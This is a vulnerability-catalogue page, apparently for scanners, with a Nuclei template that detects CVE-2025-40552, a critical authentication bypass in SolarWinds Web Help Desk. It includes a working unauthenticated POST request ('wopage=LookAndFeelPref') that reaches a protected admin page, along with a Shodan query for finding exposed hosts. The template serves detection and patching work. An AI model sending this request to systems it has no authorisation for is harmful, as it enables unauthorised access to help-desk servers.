SolarWinds Web Help Desk - Authentication Bypass

CVE-2025-40552

Verified

Description

SolarWinds Web Help Desk contains an authentication bypass vulnerability caused by improper access control, letting attackers execute protected actions without authentication, exploit requires no special conditions.

Severity

Critical

CVSS Score

9.8

Exploit Probability

Affected Product

web_help_desk

Published Date

February 26, 2026

Template Author

watchtowr, dhiyaneshdk

CVE-2025-40552.yaml

id: CVE-2025-40552

info:
  name: SolarWinds Web Help Desk - Authentication Bypass
  author: watchTowr,DhiyaneshDk
  severity: critical
  description: |
    SolarWinds Web Help Desk contains an authentication bypass vulnerability caused by improper access control, letting attackers execute protected actions without authentication, exploit requires no special conditions.
  impact: |
    Attackers can execute protected actions without authentication, potentially compromising system integrity and data security.
  remediation: Update to the latest version of SolarWinds Web Help Desk.
  reference:
    - https://github.com/watchtowrlabs/watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553
    - https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40552
    - https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm
    - https://nvd.nist.gov/vuln/detail/CVE-2025-40552
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-40552
    cwe-id: CWE-1390
    epss-score: 0.08551
    epss-percentile: 0.9249
  metadata:
    verified: true
    max-request: 2
    vendor: solarwinds
    product: web_help_desk
    shodan-query: http.favicon.hash:"1895809524"
  tags: cve,cve2025,solarwinds,web-help-desk,auth-bypass

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /helpdesk/WebObjects/Helpdesk.woa HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'helpdesk','WebObjects')"
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        POST /helpdesk/WebObjects/Helpdesk.woa/wo/1.2 HTTP/1.1
        Host: {{Hostname}}

        wopage=LookAndFeelPref

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, '<span>Add File</span>','saveOptions')"
          - "status_code == 200"
        condition: and
# digest: 4b0a0048304602210081f7f4659cfd6ffdc7748da8ad653d8cc9e6f4a11175d530e3d8a21fbbd179ac022100d06368c701a73828d18db0319da50404454155fdf36fbbda22315b53b81ba5e2:922c64590222798bb761d5b6d8e72950

9.8Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID:

cve-2025-40552

CWE ID:

cwe-1390

References

https://github.com/watchtowrlabs/watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553 https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40552 https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm https://nvd.nist.gov/vuln/detail/CVE-2025-40552

Remediation Steps

Update to the latest version of SolarWinds Web Help Desk.

id: CVE-2025-40552

info:
  name: SolarWinds Web Help Desk - Authentication Bypass
  author: watchTowr,DhiyaneshDk
  severity: critical
  description: |
    SolarWinds Web Help Desk contains an authentication bypass vulnerability caused by improper access control, letting attackers execute protected actions without authentication, exploit requires no special conditions.
  impact: |
    Attackers can execute protected actions without authentication, potentially compromising system integrity and data security.
  remediation: Update to the latest version of SolarWinds Web Help Desk.
  reference:
    - https://github.com/watchtowrlabs/watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553
    - https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40552
    - https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm
    - https://nvd.nist.gov/vuln/detail/CVE-2025-40552
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-40552
    cwe-id: CWE-1390
    epss-score: 0.08551
    epss-percentile: 0.9249
  metadata:
    verified: true
    max-request: 2
    vendor: solarwinds
    product: web_help_desk
    shodan-query: http.favicon.hash:"1895809524"
  tags: cve,cve2025,solarwinds,web-help-desk,auth-bypass

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /helpdesk/WebObjects/Helpdesk.woa HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'helpdesk','WebObjects')"
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        POST /helpdesk/WebObjects/Helpdesk.woa/wo/1.2 HTTP/1.1
        Host: {{Hostname}}

        wopage=LookAndFeelPref

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, '<span>Add File</span>','saveOptions')"
          - "status_code == 200"
        condition: and
# digest: 4b0a0048304602210081f7f4659cfd6ffdc7748da8ad653d8cc9e6f4a11175d530e3d8a21fbbd179ac022100d06368c701a73828d18db0319da50404454155fdf36fbbda22315b53b81ba5e2:922c64590222798bb761d5b6d8e72950

SolarWinds Web Help Desk - Authentication Bypass

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

SolarWinds Web Help Desk - Authentication Bypass

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps